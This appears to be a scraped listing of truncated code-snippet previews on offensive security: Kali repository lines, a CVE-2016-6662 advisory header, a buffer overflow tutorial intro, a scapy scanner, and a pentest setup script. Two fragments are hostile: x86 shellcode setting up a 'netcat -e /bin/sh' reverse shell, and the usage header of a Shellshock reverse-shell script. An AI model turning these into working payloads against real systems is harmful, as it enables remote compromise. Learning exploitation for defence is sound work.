Getting started:
Related tutorials:
- MySQL-CLI: https://www.youtube.com/playlist?list=PLfdtiltiRHWEw4-kRrh1ZZy_3OcQxTn7P
- Analyzing Business Metrics: https://www.codecademy.com/learn/sql-analyzing-business-metrics
deb http://kali.cs.nctu.edu.tw/ /kali main contrib non-free | |
deb http://kali.cs.nctu.edu.tw/ /wheezy main contrib non-free | |
deb http://kali.cs.nctu.edu.tw/kali kali-dev main contrib non-free | |
deb http://kali.cs.nctu.edu.tw/kali kali-dev main/debian-installer | |
deb-src http://kali.cs.nctu.edu.tw/kali kali-dev main contrib non-free | |
deb http://kali.cs.nctu.edu.tw/kali kali main contrib non-free | |
deb http://kali.cs.nctu.edu.tw/kali kali main/debian-installer | |
deb-src http://kali.cs.nctu.edu.tw/kali kali main contrib non-free | |
deb http://kali.cs.nctu.edu.tw/kali-security kali/updates main contrib non-free | |
deb-src http://kali.cs.nctu.edu.tw/kali-security kali/updates main contrib non-free |
Getting started:
Related tutorials:
============================================= | |
- Discovered by: Dawid Golunski | |
- http://legalhackers.com | |
- dawid (at) legalhackers.com | |
- CVE-2016-6662 | |
- Release date: 12.09.2016 | |
- Severity: Critical | |
============================================= |
#!/usr/bin/env bash | |
# Script to reverse engineer the build of a given Debian / Ubuntu server | |
# I do this all the time: take an existing server, create a Bash / Ansible / Puppet / Chef | |
# built script, to allow Continuous Depoyment. | |
# It's tedious, but this script will give you the basics to get started. | |
# Make sure you have "sudo" access to get all the details. | |
# setup folders |
This tutorial is based on the Computerphile video, made by Dr. Mike Pound
https://www.youtube.com/watch?v=1S0aBV-Waeo
The tutorial will show you how to trigger and exploit a buffer overflow attack against a custom C program, using Kali Linux 32-bit PAE 2016.1.
Torrent Link: https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vbox-i686.torrent
from scapy.all import sr, IP, TCP | |
import argparse | |
import time | |
class scanner(): | |
def __init__(self, host_start, host_end): |
#!/bin/bash | |
echo "" | |
echo "==========================================================================" | |
echo "= Pentest Attack Machine Setup =" | |
echo "= Based on the setup from The Hacker Playbook =" | |
echo "==========================================================================" | |
echo "" | |
# Prepare tools folder |
jmp short forward | |
back: | |
pop esi | |
xor eax, eax | |
mov byte [esi + 11], al ; terminate /bin/netcat | |
mov byte [esi + 14], al ; terminate -e | |
mov byte [esi + 22], al ; terminate /bin/sh | |
mov byte [esi + 38], al ; terminate 127.127.127.127 | |
mov byte [esi + 43], al ; terminate 9999 | |
mov long [esi + 44], esi ; address of /bin/netcat in AAAA |
#!/usr/bin/env python2 | |
# | |
# CVE-2014-6271 reverse shell | |
# | |
# Same as all the others, just showing off some pwntools. | |
# | |
# Usage: | |
# python shell.py http://host/cgi-bin/script.sh | |
# python shell.py http://host/cgi-bin/script.sh PORT=12345 | |
# |